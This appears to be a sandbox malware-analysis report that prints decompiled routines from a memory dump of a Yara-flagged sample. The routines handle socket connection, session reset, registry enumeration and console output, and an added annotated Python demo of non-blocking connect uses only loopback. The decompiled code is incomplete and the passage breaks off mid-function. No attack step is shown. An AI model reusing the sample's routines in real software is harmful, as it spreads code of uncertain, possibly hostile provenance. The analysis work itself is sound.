                                                                                    				if(_a8 == 0) {
                                                                                    					_t14 = _a4;
                                                                                    					_t24 =  !=  ? 0x1c : 0x10;
                                                                                    					__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t14,  !=  ? 0x1c : 0x10);   // connect(sock, &addr, addrlen)
                                                                                    					if(_t14 == 0xffffffff) {   // SOCKET_ERROR; the decompiler shows _t14 but the value tested is connect()'s return
                                                                                    						goto L10;
                                                                                    					} else {
                                                                                    						__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x23);   // FD_READ | FD_WRITE | FD_CLOSE
                                                                                    						if(_t14 == 0xffffffff) {
                                                                                    							goto L10;
                                                                                    						} else {
                                                                                    							 *((intOrPtr*)(__ecx + 0x4c)) = 1;
                                                                                    							 *((intOrPtr*)(__ecx + 0x50)) = 1;
                                                                                    							SetLastError(0);
                                                                                    							if( *((intOrPtr*)( *_t31 + 0x7c))() != 2) {   // virtual call through slot 0x7c; a return of 2 is the failure case
                                                                                    								goto L5;
                                                                                    							} else {
                                                                                    								_t19 = GetLastError();
                                                                                    								_t20 =  ==  ? 0x4c7 : _t19;   // 0x4c7 = ERROR_CANCELLED substituted when the handler set no error (condition lost by the decompiler)
                                                                                    								__imp__#112( ==  ? 0x4c7 : _t19);   // WSASetLastError
                                                                                    								goto L10;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x30);   // FD_CONNECT | FD_CLOSE; the socket is non-blocking from here on
                                                                                    					if(__eax == 0xffffffff) {
                                                                                    						L10:
                                                                                    						return 0;
                                                                                    					} else {
                                                                                    						_t21 = _a4;
                                                                                    						_t28 =  !=  ? 0x1c : 0x10;
                                                                                    						__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t21,  !=  ? 0x1c : 0x10);   // connect(sock, &addr, addrlen)
                                                                                    						if(_t21 == 0) {
                                                                                    							L5:
                                                                                    							return 1;
                                                                                    						} else {
                                                                                    							if(_t21 != 0xffffffff) {
                                                                                    								goto L10;
                                                                                    							} else {
                                                                                    								__imp__#111();   // WSAGetLastError
                                                                                    								if(_t21 != 0x2733) {   // 0x2733 = WSAEWOULDBLOCK: the connect is in progress and completes via FD_CONNECT, so it counts as success
                                                                                    									goto L10;
                                                                                    								} else {
                                                                                    									goto L5;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}


                                                                                    APIs
                                                                                    • WSAEventSelect.WS2_32(?,?,00000030), ref: 04ECED04
                                                                                    • connect.WS2_32(?,?,00000010), ref: 04ECED2C
                                                                                    • WSAGetLastError.WS2_32 ref: 04ECED3F
                                                                                    • connect.WS2_32(?,?,00000010), ref: 04ECED6F
                                                                                    • WSAEventSelect.WS2_32(?,?,00000023), ref: 04ECED82
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECED9D
                                                                                    • GetLastError.KERNEL32 ref: 04ECEDAF
                                                                                    • WSASetLastError.WS2_32(00000000), ref: 04ECEDC0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EventSelectconnect
                                                                                    • String ID:
                                                                                    • API String ID: 371153081-0
                                                                                    • Opcode ID: 70a8d2ce6ba15a457240793eecc0c881429404e37b974f645faddcaecd071699
                                                                                    • Instruction ID: 4bcb072debdc0fb81b64795fe78b1d4580949d74e90eece616272f4280d24e30
                                                                                    • Opcode Fuzzy Hash: 70a8d2ce6ba15a457240793eecc0c881429404e37b974f645faddcaecd071699
                                                                                    • Instruction Fuzzy Hash: 4B21D230200600DFEB345F38E809B6A7BA6FF80326F104A1DF966C66E0D779EC528B10
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
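E04ECECF0 treats WSAEWOULDBLOCK (0x2733) from connect() as success and leaves completion to the FD_CONNECT event registered with WSAEventSelect. The Python below is an added example, not code from the sample or from the report, that reproduces that decision on an ordinary socket: connect_ex() returns the error code instead of raising, EINPROGRESS/EWOULDBLOCK (WSAEWOULDBLOCK on Windows) are taken as "pending", and the FD_CONNECT wait is modelled with select() followed by SO_ERROR, which is where the real outcome of a non-blocking connect is reported. The loopback listener is constructed inside the example; no real peer is contacted, and the mapping of the Winsock event onto select() is this example's assumption.

```python
import errno
import select
import socket

# Error codes that mean "the connect is pending, not failed". Winsock reports
# WSAEWOULDBLOCK (10035 = 0x2733, the value E04ECECF0 compares against); POSIX reports
# EINPROGRESS. connect_ex() returns these codes instead of raising.
PENDING = {errno.EINPROGRESS, errno.EWOULDBLOCK, errno.EAGAIN}
PENDING.add(getattr(errno, "WSAEWOULDBLOCK", errno.EINPROGRESS))

def start_connect(sock, addr):
    """The _a8 != 0 path of E04ECECF0: issue the connect on a non-blocking socket and
    return True when it completed or is pending, False only on an immediate hard error."""
    sock.setblocking(False)           # WSAEventSelect puts the socket in this mode on Windows
    rc = sock.connect_ex(addr)
    return rc == 0 or rc in PENDING

def finish_connect(sock, timeout):
    """Stand-in for the FD_CONNECT notification: wait until the socket becomes writable,
    then read SO_ERROR, which carries the real result of a non-blocking connect."""
    _, writable, _ = select.select([], [sock], [], timeout)
    if not writable:
        return False                  # timed out: treat as failure
    return sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0

def connect_async(addr, timeout=2.0):
    """Full round trip: start the connect, then wait for its completion."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        return start_connect(sock, addr) and finish_connect(sock, timeout)
    finally:
        sock.close()

def demo():
    """Constructed scenario: a listener on a loopback port chosen by the OS, one attempt while
    it listens and one after it has closed. Returns (connected, connected_after_close)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    try:
        first = connect_async(("127.0.0.1", port))   # handshake completes in the backlog, no accept() needed
    finally:
        listener.close()
    second = connect_async(("127.0.0.1", port))      # nothing listens any more: refused, never "pending"
    return first, second

if __name__ == "__main__":
    print(demo())
```

The point the decompiled function makes, and the example keeps, is that a pending connect is not an error for the caller: the decision whether the connection exists is deferred to the event (here SO_ERROR after select()), which is also where a refused connection finally shows up.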

                                                                                    C-Code - Quality: 100%
                                                                                    			// Resets a session object to its initial state under the object's own critical section:
                                                                                    			// releases the buffer at +0x5c, clears three events, calls two helpers on embedded
                                                                                    			// sub-objects, replaces the object's private heap, sets state 3 and signals the event at
                                                                                    			// +4 to wake the owning thread. The comments are editorial annotations; the statements
                                                                                    			// are unchanged.
                                                                                    			E04ECE430(void* __ecx) {
                                                                                    				void* __ebx;
                                                                                    				void* _t27;
                                                                                    				int _t29;
                                                                                    				void* _t32;
                                                                                    				struct _CRITICAL_SECTION* _t39;
                                                                                    
                                                                                    				_t32 = __ecx;
                                                                                    				_t39 = __ecx + 0x14c;   // CRITICAL_SECTION embedded in the object
                                                                                    				EnterCriticalSection(_t39);
                                                                                    				_t21 =  *((intOrPtr*)(_t32 + 0x5c));
                                                                                    				if( *((intOrPtr*)(_t32 + 0x5c)) != 0) {
                                                                                    					E04EDE947(_t21);   // releases the buffer at +0x5c (by use: the pointer and its two companion fields are cleared right after)
                                                                                    					 *((intOrPtr*)(_t32 + 0x5c)) = 0;
                                                                                    					 *((intOrPtr*)(_t32 + 0x60)) = 0;
                                                                                    					 *((intOrPtr*)(_t32 + 0x64)) = 0;
                                                                                    				}
                                                                                    				ResetEvent( *(_t32 + 0x174));   // three event handles back to the non-signalled state
                                                                                    				ResetEvent( *(_t32 + 0x178));
                                                                                    				ResetEvent( *(_t32 + 0x17c));
                                                                                    				E04EBAC50(_t32 + 0x164);        // helpers on the sub-objects at +0x164 and +0x84 (their bodies are not in this section)
                                                                                    				E04EBACB0(_t32, _t32 + 0x84);
                                                                                    				_t27 =  *(_t32 + 0x68);
                                                                                    				if(_t27 != 0) {
                                                                                    					HeapDestroy(_t27);   // everything allocated from the private heap goes away in one call
                                                                                    				}
                                                                                    				// recreate the heap from the flags, initial size and maximum size kept at +0x6c/+0x70/+0x74
                                                                                    				 *(_t32 + 0x68) = HeapCreate( *(_t32 + 0x6c),  *(_t32 + 0x70),  *(_t32 + 0x74));
                                                                                    				 *((intOrPtr*)(_t32 + 0x180)) = 0;   // counters cleared
                                                                                    				 *((intOrPtr*)(_t32 + 0x188)) = 0;
                                                                                    				 *((intOrPtr*)(_t32 + 0x184)) = 0;
                                                                                    				 *((intOrPtr*)(_t32 + 0x50)) = 3;    // state
                                                                                    				_t29 = SetEvent( *(_t32 + 4));      // wake whoever waits on the object
                                                                                    				LeaveCriticalSection(_t39);
                                                                                    				return _t29;
                                                                                    			}

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Event$Reset$CriticalHeapSection$CreateDestroyEnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 836899767-0
                                                                                    • Opcode ID: 15d3c53c45b40df35605290aff44ccbedb3bd54b0333ba487a64b4dd6502edf9
                                                                                    • Instruction ID: fa205012d97b27ae25a34dd5169b22975f4f2e74c482f21dc001be21112ea7d0
                                                                                    • Opcode Fuzzy Hash: 15d3c53c45b40df35605290aff44ccbedb3bd54b0333ba487a64b4dd6502edf9
                                                                                    • Instruction Fuzzy Hash: 6211DA71501200EFEF41AF65D988B9A3BA9FF84305F0440B9ED098E25ADB3A9915DFA0
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E04ECF560(void* __ecx) {
                                                                                    				void* __ebx;
                                                                                    				void* _t26;
                                                                                    				int _t28;
                                                                                    				void* _t31;
                                                                                    				struct _CRITICAL_SECTION* _t38;
                                                                                    				intOrPtr _t20; /* declaration omitted by the decompiler; used below */
                                                                                    
                                                                                    				_t31 = __ecx;
                                                                                    				_t38 = __ecx + 0x14c;
                                                                                    				EnterCriticalSection(_t38);
                                                                                    				_t20 =  *((intOrPtr*)(_t31 + 0x5c));
                                                                                    				if( *((intOrPtr*)(_t31 + 0x5c)) != 0) {
                                                                                    					E04EDE947(_t20);
                                                                                    					 *((intOrPtr*)(_t31 + 0x5c)) = 0;
                                                                                    					 *((intOrPtr*)(_t31 + 0x60)) = 0;
                                                                                    					 *((intOrPtr*)(_t31 + 0x64)) = 0;
                                                                                    				}
                                                                                    				ResetEvent( *(_t31 + 0x174));
                                                                                    				ResetEvent( *(_t31 + 0x178));
                                                                                    				ResetEvent( *(_t31 + 0x17c));
                                                                                    				E04EBAC50(_t31 + 0x164);
                                                                                    				E04EBACB0(_t31, _t31 + 0x84);
                                                                                    				_t26 =  *(_t31 + 0x68);
                                                                                    				if(_t26 != 0) {
                                                                                    					HeapDestroy(_t26);
                                                                                    				}
                                                                                    				 *(_t31 + 0x68) = HeapCreate( *(_t31 + 0x6c),  *(_t31 + 0x70),  *(_t31 + 0x74));
                                                                                    				 *((intOrPtr*)(_t31 + 0x180)) = 0;
                                                                                    				 *((intOrPtr*)(_t31 + 0x184)) = 0;
                                                                                    				 *((intOrPtr*)(_t31 + 0x50)) = 3;
                                                                                    				_t28 = SetEvent( *(_t31 + 4));
                                                                                    				LeaveCriticalSection(_t38);
                                                                                    				return _t28;
                                                                                    			}

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Event$Reset$CriticalHeapSection$CreateDestroyEnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 836899767-0
                                                                                    • Opcode ID: d4780c627fed52df9a4a7e0e4a770ec8338107dc03138a053da0a4f2132fd417
                                                                                    • Instruction ID: 207920127068b77c39ad54f5073a83ebfd452897870de89426e6dbe6e0c96b73
                                                                                    • Opcode Fuzzy Hash: d4780c627fed52df9a4a7e0e4a770ec8338107dc03138a053da0a4f2132fd417
                                                                                    • Instruction Fuzzy Hash: DF11EC71501200AFEF41AF65DD88B9A3B65FF84305F0441B9ED098E25ADB369915DFA0
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 82%
                                                                                    			E04EC1640(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                    				signed int _v8;
                                                                                    				short _v528;
                                                                                    				short* _v532;
                                                                                    				short* _v536;
                                                                                    				short* _v540;
                                                                                    				void* _v544;
                                                                                    				int _v548;
                                                                                    				int _v552;
                                                                                    				void* _v556;
                                                                                    				short* _v560;
                                                                                    				intOrPtr _v564;
                                                                                    				signed int _t61;
                                                                                    				short* _t64;
                                                                                    				short* _t73;
                                                                                    				int* _t83;
                                                                                    				intOrPtr* _t84;
                                                                                    				void* _t102;
                                                                                    				int _t103;
                                                                                    				void** _t105;
                                                                                    				short** _t110;
                                                                                    				intOrPtr _t113;
                                                                                    				void* _t117;
                                                                                    				short* _t120;
                                                                                    				short* _t121;
                                                                                    				void* _t122;
                                                                                    				short* _t125;
                                                                                    				short* _t126;
                                                                                    				void* _t128;
                                                                                    				intOrPtr* _t129;
                                                                                    				intOrPtr _t131;
                                                                                    				short* _t132;
                                                                                    				void* _t134;
                                                                                    				signed int _t137;
                                                                                    				void* _t138;
                                                                                    				void* _t139;
                                                                                    				/* declarations omitted by the decompiler (82% quality); used below */
                                                                                    				intOrPtr _t119;
                                                                                    				short* _t72;
                                                                                    				void* _t124;
                                                                                    				void* _t48;
                                                                                    
                                                                                    				_t61 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t61 ^ _t137;
                                                                                    				_t131 = _a8;
                                                                                    				_t119 = _a4;
                                                                                    				_v564 = __ecx;
                                                                                    				_v532 = 0;
                                                                                    				_t105 = _a4 + 1;
                                                                                    				_t64 = _t131 - 1 + _t105;
                                                                                    				_v536 = _t105;
                                                                                    				_v540 = _t64;
                                                                                    				if(_t64 - _t105 >= 4) {
                                                                                    					_t102 =  *_t105;
                                                                                    					_v536 =  &(_t105[1]);
                                                                                    				} else {
                                                                                    					_v532 = 1;
                                                                                    					_t102 = 0;
                                                                                    				}
                                                                                    				_v560 = E04EC0CE0( &_v540);
                                                                                    				if(_v532 != 0) {
                                                                                    					L20:
                                                                                    					return E04ED572E(_v8 ^ _t137);
                                                                                    				} else {
                                                                                    					_t110 =  &_v540;
                                                                                    					_v548 = 0;
                                                                                    					_v532 = 0;
                                                                                    					_v540 = 0;
                                                                                    					_v536 = 0;
                                                                                    					E04EBB9A0(_t110, _t131);
                                                                                    					_t120 = _v536;
                                                                                    					E04EDDC90(_t120, _t119, _t131);
                                                                                    					_t139 = _t138 + 0xc;
                                                                                    					_t121 = _t120 + _t131;
                                                                                    					_v536 = _t121;
                                                                                    					if(RegOpenKeyExW(_t102, _v560, 0, 0x20119,  &_v544) != 0) {
                                                                                    						L13:
                                                                                    						_t72 = _v560;
                                                                                    						if(_v560 != 0) {
                                                                                    							E04ED573F(_t72);
                                                                                    							_t139 = _t139 + 4;
                                                                                    						}
                                                                                    						_t132 = _v540;
                                                                                    						if(_t132 != 0) {
                                                                                    							_t122 = _t121 - _t132;
                                                                                    							_t73 = _t132;
                                                                                    						} else {
                                                                                    							_t122 = 0;
                                                                                    							_t73 = 0;
                                                                                    						}
                                                                                    						_push(_t110);
                                                                                    						_push(0x3f);
                                                                                    						_push(_t122);
                                                                                    						_push(_t73);
                                                                                    						E04EB1C60( *((intOrPtr*)(_v564 + 4)));
                                                                                    						if(_t132 != 0) {
                                                                                    							E04ED573F(_t132);
                                                                                    						}
                                                                                    						goto L20;
                                                                                    					}
                                                                                    					_t103 = 0;
                                                                                    					_v552 = 0x104;
                                                                                    					if(RegEnumKeyExW(_v544, 0,  &_v528,  &_v552, 0, 0, 0, 0) != 0) {
                                                                                    						L12:
                                                                                    						RegCloseKey(_v544);
                                                                                    						goto L13;
                                                                                    					}
                                                                                    					asm("o16 nop [eax+eax]");
                                                                                    					do {
                                                                                    						_v548 = 0;
                                                                                    						_t103 = _t103 + 1;
                                                                                    						_t83 = RegOpenKeyExW(_v544,  &_v528, 0, 0x20119,  &_v556);
                                                                                    						if(_t83 == 0) {
                                                                                    							RegQueryInfoKeyW(_v556, 0, 0, 0,  &_v548, _t83, _t83, _t83, _t83, _t83, _t83, _t83);
                                                                                    							RegCloseKey(_v556);
                                                                                    						}
                                                                                    						_t84 =  &_v528;
                                                                                    						_t117 = _t84 + 2;
                                                                                    						do {
                                                                                    							_t113 =  *_t84;
                                                                                    							_t84 = _t84 + 2;
                                                                                    						} while (_t113 != 0);
                                                                                    						_t134 = 2 + (_t84 - _t117 >> 1) * 2;
                                                                                    						_t124 =  ==  ? 0 : _t121 - _v540;
                                                                                    						E04EBB9A0( &_v540, ( ==  ? 0 : _t121 - _v540) + _t134);
                                                                                    						_t125 = _v536;
                                                                                    						E04EDDC90(_t125,  &_v528, _t134);
                                                                                    						_t126 = _t125 + _t134;
                                                                                    						_v536 = _t126;
                                                                                    						_t139 = _t139 + 0xc;
                                                                                    						_t128 =  ==  ? 0 : _t126 - _v540;
                                                                                    						_t110 =  &_v540;
                                                                                    						_t48 = _t128 + 4; // 0x4
                                                                                    						E04EBB9A0(_t110, _t48);
                                                                                    						_t129 = _v536;
                                                                                    						 *_t129 = _v548;
                                                                                    						_t121 = _t129 + 4;
                                                                                    						_v552 = 0x104;
                                                                                    						_v536 = _t121;
                                                                                    					} while (RegEnumKeyExW(_v544, _t103,  &_v528,  &_v552, 0, 0, 0, 0) == 0);
                                                                                    					goto L12;
                                                                                    				}
                                                                                    			}
                                                                                    0x04ec1894
                                                                                    0x04ec189a
                                                                                    0x00000000
                                                                                    0x04ec189a
                                                                                    0x04ec1767
                                                                                    0x04ec1770
                                                                                    0x04ec1776
                                                                                    0x04ec178e
                                                                                    0x04ec1796
                                                                                    0x04ec179e
                                                                                    0x04ec17ba
                                                                                    0x04ec17c6
                                                                                    0x04ec17c6
                                                                                    0x04ec17c8
                                                                                    0x04ec17ce
                                                                                    0x04ec17d1
                                                                                    0x04ec17d1
                                                                                    0x04ec17d4
                                                                                    0x04ec17d7
                                                                                    0x04ec17e2
                                                                                    0x04ec17f3
                                                                                    0x04ec1800
                                                                                    0x04ec1805
                                                                                    0x04ec1814
                                                                                    0x04ec181f
                                                                                    0x04ec1829
                                                                                    0x04ec182f
                                                                                    0x04ec1836
                                                                                    0x04ec1839
                                                                                    0x04ec183f
                                                                                    0x04ec1843
                                                                                    0x04ec1848
                                                                                    0x04ec1863
                                                                                    0x04ec186d
                                                                                    0x04ec1870
                                                                                    0x04ec187a
                                                                                    0x04ec188c
                                                                                    0x00000000
                                                                                    0x04ec1770

                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?), ref: 04EC1720
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,00000000,00020119,?), ref: 04EC1753
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,?,?,00000000,00020119,?), ref: 04EC1796
                                                                                    • RegQueryInfoKeyW.ADVAPI32 ref: 04EC17BA
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,00020119,?), ref: 04EC17C6
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000104,00000000,00000000,00000000,00000000,00000004,00000000,00020119,?), ref: 04EC1880
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,00020119,?), ref: 04EC189A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEnumOpen$InfoQuery
                                                                                    • String ID:
                                                                                    • API String ID: 396531129-0
                                                                                    • Opcode ID: 9be8220d6aa676a115dcac4cf5973fc5deb11483e26ac94f56506ca75afdce08
                                                                                    • Instruction ID: baa0f76ea03fdb252f9deb68402f6e88f21022bf3abd80821c25ad3315334614
                                                                                    • Opcode Fuzzy Hash: 9be8220d6aa676a115dcac4cf5973fc5deb11483e26ac94f56506ca75afdce08
                                                                                    • Instruction Fuzzy Hash: 9971337194122DAFEB209F64DD88BEAB7B8EF54308F1001E9E909A7151D770AF85CF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 73%
                                                                                    			E04EEE9AE(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                    				signed int _v8;
                                                                                    				signed char _v15;
                                                                                    				char _v16;
                                                                                    				void _v24;
                                                                                    				short _v28;
                                                                                    				char _v31;
                                                                                    				void _v32;
                                                                                    				long _v36;
                                                                                    				intOrPtr _v40;
                                                                                    				void* _v44;
                                                                                    				signed int _v48;
                                                                                    				signed char* _v52;
                                                                                    				long _v56;
                                                                                    				int _v60;
                                                                                    				signed int _t78;
                                                                                    				signed int _t80;
                                                                                    				int _t86;
                                                                                    				void* _t94;
                                                                                    				long _t97;
                                                                                    				void _t105;
                                                                                    				void* _t112;
                                                                                    				signed int _t116;
                                                                                    				signed int _t118;
                                                                                    				signed char _t123;
                                                                                    				signed char _t128;
                                                                                    				intOrPtr _t129;
                                                                                    				signed int _t131;
                                                                                    				signed char* _t133;
                                                                                    				intOrPtr* _t135;
                                                                                    				signed int _t136;
                                                                                    				void* _t137;
                                                                                    
                                                                                    				_t78 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t78 ^ _t136;
                                                                                    				_t80 = _a8;
                                                                                    				_t118 = _t80 >> 6;
                                                                                    				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                                                    				_t133 = _a12;
                                                                                    				_v52 = _t133;
                                                                                    				_v48 = _t118;
                                                                                    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4f06680 + _t118 * 4)) + _t116 + 0x18));
                                                                                    				_v40 = _a16 + _t133;
                                                                                    				_t86 = GetConsoleCP();
                                                                                    				_t135 = _a4;
                                                                                    				_v60 = _t86;
                                                                                    				 *_t135 = 0;
                                                                                    				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                                                    				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                                                    				while(_t133 < _v40) {
                                                                                    					_v28 = 0;
                                                                                    					_v31 =  *_t133;
                                                                                    					_t129 =  *((intOrPtr*)(0x4f06680 + _v48 * 4));
                                                                                    					_t123 =  *(_t129 + _t116 + 0x2d);
                                                                                    					if((_t123 & 0x00000004) == 0) {
                                                                                    						if(( *(E04EE94DA(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                    							_push(1);
                                                                                    							_push(_t133);
                                                                                    							goto L8;
                                                                                    						} else {
                                                                                    							if(_t133 >= _v40) {
                                                                                    								_t131 = _v48;
                                                                                    								 *((char*)( *((intOrPtr*)(0x4f06680 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                                                    								 *( *((intOrPtr*)(0x4f06680 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x4f06680 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                                                    								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                    							} else {
                                                                                    								_t112 = E04EEAC1D( &_v28, _t133, 2);
                                                                                    								_t137 = _t137 + 0xc;
                                                                                    								if(_t112 != 0xffffffff) {
                                                                                    									_t133 =  &(_t133[1]);
                                                                                    									goto L9;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t128 = _t123 & 0x000000fb;
                                                                                    						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                                                    						_push(2);
                                                                                    						_v15 = _t128;
                                                                                    						 *(_t129 + _t116 + 0x2d) = _t128;
                                                                                    						_push( &_v16);
                                                                                    						L8:
                                                                                    						_push( &_v28);
                                                                                    						_t94 = E04EEAC1D();
                                                                                    						_t137 = _t137 + 0xc;
                                                                                    						if(_t94 != 0xffffffff) {
                                                                                    							L9:
                                                                                    							_t133 =  &(_t133[1]);
                                                                                    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                    							_v56 = _t97;
                                                                                    							if(_t97 != 0) {
                                                                                    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                                    									L19:
                                                                                    									 *_t135 = GetLastError();
                                                                                    								} else {
                                                                                    									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                                                                    									if(_v36 >= _v56) {
                                                                                    										if(_v31 != 0xa) {
                                                                                    											goto L16;
                                                                                    										} else {
                                                                                    											_t105 = 0xd;
                                                                                    											_v32 = _t105;
                                                                                    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                    												goto L19;
                                                                                    											} else {
                                                                                    												if(_v36 >= 1) {
                                                                                    													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                                                    													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                    													goto L16;
                                                                                    												}
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					goto L20;
                                                                                    					L16:
                                                                                    				}
                                                                                    				L20:
                                                                                    				return E04ED572E(_v8 ^ _t136);
                                                                                    			}

                                                                                    APIs
                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,04EEF123,?,00000000,?,00000000,00000000), ref: 04EEE9F0
                                                                                    • __fassign.LIBCMT ref: 04EEEA6B
                                                                                    • __fassign.LIBCMT ref: 04EEEA86
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 04EEEAAC
                                                                                    • WriteFile.KERNEL32(?,?,00000000,04EEF123,00000000,?,?,?,?,?,?,?,?,?,04EEF123,?), ref: 04EEEACB
                                                                                    • WriteFile.KERNEL32(?,?,00000001,04EEF123,00000000,?,?,?,?,?,?,?,?,?,04EEF123,?), ref: 04EEEB04
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1324828854-0
                                                                                    • Opcode ID: 0e2b31c79038847ef5e4aededf2eb2140f327802e82b00d6ab06a7d576cb38ac
                                                                                    • Instruction ID: 18187b509093c2a5c1bc6e7bd5f25ad33c6114fbde171f7aa90b20c5f4fa7b91
                                                                                    • Opcode Fuzzy Hash: 0e2b31c79038847ef5e4aededf2eb2140f327802e82b00d6ab06a7d576cb38ac
                                                                                    • Instruction Fuzzy Hash: D151C270A00249AFDB20CFA9D885AFEFBF8FF49300F14555AE956E7241E730A940CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 63%
                                                                                    			E04ED41B0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                    				signed int _v8;
                                                                                    				long _v12;
                                                                                    				void* _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				void** _v32;
                                                                                    				signed int _t53;
                                                                                    				intOrPtr _t56;
                                                                                    				long _t61;
                                                                                    				long* _t68;
                                                                                    				long _t71;
                                                                                    				long _t87;
                                                                                    				intOrPtr _t90;
                                                                                    				void** _t100;
                                                                                    				void* _t101;
                                                                                    				long* _t104;
                                                                                    				void* _t106;
                                                                                    				void* _t108;
                                                                                    				signed int _t109;
                                                                                    				void* _t110;
                                                                                    
                                                                                    				_t90 = __ecx;
                                                                                    				_t53 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t53 ^ _t109;
                                                                                    				_v20 = _a8;
                                                                                    				_t56 = _a12;
                                                                                    				_v24 = __ecx;
                                                                                    				_v28 = _a4;
                                                                                    				if(_t56 <= 0) {
                                                                                    					return E04ED572E(_v8 ^ _t109);
                                                                                    				} else {
                                                                                    					_t100 = __ecx + 0x94;
                                                                                    					_v32 = _t100;
                                                                                    					do {
                                                                                    						_v16 = 0;
                                                                                    						_t87 =  <  ? _t56 :  *((intOrPtr*)(_t90 + 0x18));
                                                                                    						_v12 = _t87;
                                                                                    						if(E04ECC4C0( &(_t100[7]),  &_v16) != 0) {
                                                                                    							_t101 = _v16;
                                                                                    						} else {
                                                                                    							_t108 = _t100[4];
                                                                                    							_t101 = HeapAlloc( *_t100, 0, _t108 + 0x38);
                                                                                    							_v16 = _t101;
                                                                                    							 *(_t101 + 0x14) = _v32;
                                                                                    							_t20 = _t101 + 0x38; // 0x38
                                                                                    							 *(_t101 + 0x24) = _t108;
                                                                                    							 *((intOrPtr*)(_t101 + 0x20)) = _t20;
                                                                                    						}
